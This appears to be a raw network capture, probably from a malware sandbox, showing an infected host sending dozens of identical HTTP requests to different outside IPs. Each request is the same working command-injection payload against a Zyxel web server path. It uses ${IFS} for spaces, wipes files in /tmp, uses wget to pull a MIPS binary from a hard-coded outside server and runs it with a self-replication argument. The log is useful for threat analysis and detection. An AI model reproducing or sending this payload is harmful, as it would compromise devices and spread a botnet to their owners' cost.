                                              Jan 29, 2024 07:03:45.932142019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3454192.168.2.1453184137.178.64.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932178974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3455192.168.2.1447508156.218.214.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932210922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3456192.168.2.145464623.5.185.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932279110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3457192.168.2.1455016175.81.207.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932312012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3458192.168.2.145307484.30.124.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932323933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3459192.168.2.1444750220.136.30.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932374954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3460192.168.2.1439752146.100.209.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932401896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3461192.168.2.1447190221.204.194.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932445049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3462192.168.2.1439992182.139.63.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932456970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3463192.168.2.143455436.140.154.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932514906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3464192.168.2.1445552199.196.16.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932569981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3465192.168.2.1454930220.205.184.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932595015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3466192.168.2.1457658115.226.128.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932646036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3467192.168.2.145299259.136.172.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932692051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3468192.168.2.144375685.145.116.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932727098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3469192.168.2.145194076.24.193.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932770014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3470192.168.2.143972270.128.50.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932801008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3471192.168.2.1440946117.35.144.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932843924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3472192.168.2.1448206164.240.36.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932893038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3473192.168.2.143935270.185.182.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932914019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3474192.168.2.145390861.205.234.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932951927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3475192.168.2.1454902140.6.84.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932982922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3476192.168.2.145923672.223.240.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933028936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3477192.168.2.1458588101.194.77.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933049917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3478192.168.2.1446930102.38.52.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933099031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3479192.168.2.1453304162.176.31.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933135986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3480192.168.2.1460218126.111.61.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933159113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3481192.168.2.1436426217.111.220.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933180094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3482192.168.2.1445266187.38.233.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933219910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3483192.168.2.1457992107.228.156.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933258057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3484192.168.2.143593484.66.149.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933300018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3485192.168.2.144144040.248.128.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933351040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3486192.168.2.145452058.74.38.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933386087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3487192.168.2.145828292.145.5.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933419943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3488192.168.2.1457656107.50.133.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933476925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3489192.168.2.1439338213.229.174.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933506966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3490192.168.2.143701692.206.217.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933583975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3491192.168.2.143994680.111.220.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933593988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3492192.168.2.144795275.62.95.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933644056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3493192.168.2.1456972171.40.30.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933682919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3494192.168.2.1436194144.77.253.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933731079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3495192.168.2.145102690.134.0.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933752060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3496192.168.2.1451492124.215.225.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933801889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3497192.168.2.1446526192.27.141.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933835030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3498192.168.2.1451716188.225.160.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933875084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3499192.168.2.1448992189.173.174.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933913946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3500192.168.2.1443724116.59.249.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.933965921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3501192.168.2.1453120100.189.138.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934000015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3502192.168.2.1459740140.181.124.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934026957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3503192.168.2.145825050.191.146.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934070110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3504192.168.2.145069837.166.70.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934108019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3505192.168.2.145690284.148.25.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934158087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3506192.168.2.1450082135.118.70.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934174061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3507192.168.2.14499245.115.231.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934214115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3508192.168.2.144156058.162.78.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934262991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3509192.168.2.145846032.145.84.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934294939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3510192.168.2.1441800146.140.231.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934326887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3511192.168.2.1457242179.217.11.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934360981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3512192.168.2.1448972198.73.151.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934393883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3513192.168.2.14586061.124.209.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934420109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3514192.168.2.1443564170.223.136.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934475899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3515192.168.2.143894484.145.122.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934520006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3516192.168.2.1448576156.92.174.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934551001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3517192.168.2.1452352186.251.211.35443
                                              TimestampBytes transferredDirectionData
